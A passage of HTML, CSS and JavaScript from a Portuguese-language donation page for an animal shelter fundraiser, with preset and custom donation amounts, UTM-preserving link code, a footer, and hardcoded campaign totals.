            <a href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=300">R$ 300,00</a>
            <a href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=400">R$ 400,00</a>
            <a href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=500">R$ 500,00</a>

            
        </div>
        
                <div class="personalizado">
          <label for="valorPersonalizado">Ou doe o que o seu coração mandar ❤️</label>
            <input type="text" id="valorPersonalizado" placeholder="R$ 00,00" oninput="atualizarValor(this)" onblur="formatarValor(this)">
            <a id="botaoDoar" href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=0" class="btn-doar">Doar</a>
            <br><br><p class="p-patas"> </p><p class="p-patas"></p>
        </div>
<script>
function getUTMs() {
    const params = new URLSearchParams(window.location.search);
    const utmParams = [];
    ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content'].forEach(param => {
        if (params.has(param)) {
            utmParams.push(`${param}=${encodeURIComponent(params.get(param))}`);
        }
    });
    return utmParams.length ? '&' + utmParams.join('&') : '';
}

function atualizarValor(input) {
    let valor = input.value.replace(/[^0-9,]/g, '').replace(',', '.');
    if (valor) {
        let num = parseFloat(valor);
        if (!isNaN(num)) {
            let utms = getUTMs();
            let novaURL = `salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=${num.toFixed(2)}` + utms;
            document.getElementById('botaoDoar').href = novaURL;
        }
    }
}

function formatarValor(input) {
    let valor = input.value.replace(/[^0-9,]/g, '').replace(',', '.');
    if (valor) {
        let num = parseFloat(valor);
        if (!isNaN(num)) {
            input.value = `R$ ${num.toFixed(2).replace('.', ',')}`;
        }
    } else {
        input.value = "";
    }
}

// Função global para manter UTMs em todos os links
function manterUTMsEmLinks() {
    const links = document.querySelectorAll('a[href]');
    const utms = getUTMs();
    
    if (utms) {
        links.forEach(link => {
            const href = link.getAttribute('href');
            // Não modificar links externos ou que já tenham UTMs
            if (href && !href.startsWith('http') && !href.startsWith('#') && !href.includes('utm_')) {
                const separator = href.includes('?') ? '&' : '?';
                link.href = href + separator + utms.substring(1); // Remove o & inicial
            }
        });
    }
}

// Executar quando a página carregar
document.addEventListener('DOMContentLoaded', function() {
    manterUTMsEmLinks();
});

</script>
<style>
    .btn-doar {
        display: block;
        width: 100%;
        text-align: center;
        padding: 10px;
        background: #24ca68;
        color: white;
        text-decoration: none;
        font-size: 18px;
        border-radius: 5px;
        margin-top: 10px;
        margin-bottom: -48px; cursor: pointer;
        transition: all 0.2s linear;
        border: none;
        outline: none;
        user-select: none;
        -webkit-user-select: none;
        -moz-user-select: none;
        -ms-user-select: none;
        pointer-events: auto;
        position: relative;
        z-index: 1;
    }
    
    .btn-doar:hover {
        background: #009d4e;
        color: white;
        text-decoration: none;
    }
    
    .btn-doar:active {
        transform: scale(0.98);
    }
    
    .personalizado {
        position: relative;
        z-index: 1;
    }
    
    .modal.open .content-modal {
        pointer-events: auto;
    }
    
    .modal.open .content-modal * {
        pointer-events: auto;
    
    }
</style>
        
    </div>
</div>
        <footer>
    <div class="aviso">
        <div class="container">
            <span>AVISO LEGAL: O texto e as imagens incluídos nessa página são de única e exclusiva responsabilidade do criador e não representam a opinião ou endosso da plataforma.</span>
        </div>
    </div>
    <style>
        .conteiner2{
            background-color: grey;
        }
    </style>
    <div class="container2">
        <div class="content-footer">
            <div class="topFooter d-flex align-items-center justify-content-between">
                <div class="logo-rodape">
                    <img src="images/logo_rodape.svg" alt="logo-rodape">
                </div>
                <div class="sociais">
                    <ul class="d-flex align-items-center">
                        <li><a href="#"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium css-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="InstagramIcon"><path d="M7.8 2h8.4C19.4 2 22 4.6 22 7.8v8.4a5.8 5.8 0 0 1-5.8 5.8H7.8C4.6 22 2 19.4 2 16.2V7.8A5.8 5.8 0 0 1 7.8 2m-.2 2A3.6 3.6 0 0 0 4 7.6v8.8C4 18.39 5.61 20 7.6 20h8.8a3.6 3.6 0 0 0 3.6-3.6V7.6C20 5.61 18.39 4 16.4 4H7.6m9.65 1.5a1.25 1.25 0 0 1 1.25 1.25A1.25 1.25 0 0 1 17.25 8 1.25 1.25 0 0 1 16 6.75a1.25 1.25 0 0 1 1.25-1.25M12 7a5 5 0 0 1 5 5 5 5 0 0 1-5 5 5 5 0 0 1-5-5 5 5 0 0 1 5-5m0 2a3 3 0 0 0-3 3 3 3 0 0 0 3 3 3 3 0 0 0 3-3 3 3 0 0 0-3-3z"></path></svg></a></li>
                        <li><div class="separador"></div></li>
                        <li><a href="#"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium css-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="FacebookIcon"><path d="M5 3h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2m13 2h-2.5A3.5 3.5 0 0 0 12 8.5V11h-2v3h2v7h3v-7h3v-3h-3V9a1 1 0 0 1 1-1h2V5z"></path></svg></a></li>
                        <li><div class="separador"></div></li>
                        <li><a href="#"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium css-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="YouTubeIcon"><path d="M10 15l5.19-3L10 9v6m11.56-7.83c.13.47.22 1.1.28 1.9.07.8.1 1.49.1 2.09L22 12c0 2.19-.16 3.8-.44 4.83-.25.9-.83 1.48-1.73 1.73-.47.13-1.33.22-2.65.28-1.3.07-2.49.1-3.59.1L12 19c-4.19 0-6.8-.16-7.83-.44-.9-.25-1.48-.83-1.73-1.73-.13-.47-.22-1.1-.28-1.9-.07-.8-.1-1.49-.1-2.09L2 12c0-2.19.16-3.8.44-4.83.25-.9.83-1.48 1.73-1.73.47-.13 1.33-.22 2.65-.28 1.3-.07 2.49-.1 3.59-.1L12 5c4.19 0 6.8.16 7.83.44.9.25 1.48.83 1.73 1.73z"></path></svg></a></li>
                    </ul>
                </div>
            </div>
            <div class="content d-flex justify-content-between">
                <div class="aba aba-links">
                    <h4>Links rápidos</h4>
                    <ul>
                        <li><a href="#">Quem somos</a></li>
                        <li><a href="#">Login</a></li>
                        <li><a href="#">Política de privacidade</a></li>
                        <li><a href="#">Termos de uso</a></li>
                    </ul>
                </div>
                <div class="aba aba-links">
                    <h4></h4>
                    <ul>
                        <li><a href="#">Dúvidas frequentes</a></li>
                        <li><a href="#">Taxas e prazos</a></li>
                        <li><a href="#">Loja de corações</a></li>
                        <li><a href="#">Segurança e transparência</a></li>
                        <li><a href="#">Busca por recibo</a></li>
                    </ul>
                </div>
                <div class="aba aba-links">
                    <h4>Fale conosco</h4>
                    <ul>
                        <li><a href="#">Clique aqui para falar conosco</a></li>
                    </ul>
                    <ul>
                        <li style="padding: 0 !important;"><span>De Segunda à Sexta</span></li>
                        <li><span>Das 9:30 às 17:00</span></li>
                        <li class="d-none d-lg-block d-xl-block"><img src="images/selo_seguranca.webp" alt="Selo de Segurança"></li>
                    </ul>
                </div>
                <div class="aba aba-links d-flex d-lg-none d-xl-none">
                    <ul>
                        <li style="text-align: right;"><img src="images/selo_seguranca.webp" alt="Selo de Segurança" width="86"></li>
                    </ul>
                </div>
                <div class="aba aba-links">
                    <h4>Baixe nosso App</h4>
                    <ul>
                        <li style="padding-bottom: 12px !important;"><a href="#"><img src="images/google_play.svg" alt="Google Play Store"></a></li>
                        <li><a href="#"><img src="images/apple_store.svg" alt="Apple Store"></a></li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
    <div class="copyright">
        <span>© 2025 - Todos direitos reservados</span>
    </div>
</footer>  
<style>
    footer {
  max-width: 1200px;
  margin: 0 auto;
  padding: 0 20px;
}
</style>
</main>
    
<script src="js/jquery.min.js"></script>
<script src="js/jquery.mask.min.js"></script>
<script src="js/swiper-bundle.min.js"></script>
<script src="js/jquery.maskMoney.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script>
    let meta = 12000.00;
    let arrecadado = 5960.00;
    let coracoes = 154;
    let apoiadores = 82;
</script>
<script src="js/scripts.js"></script>
</body></html>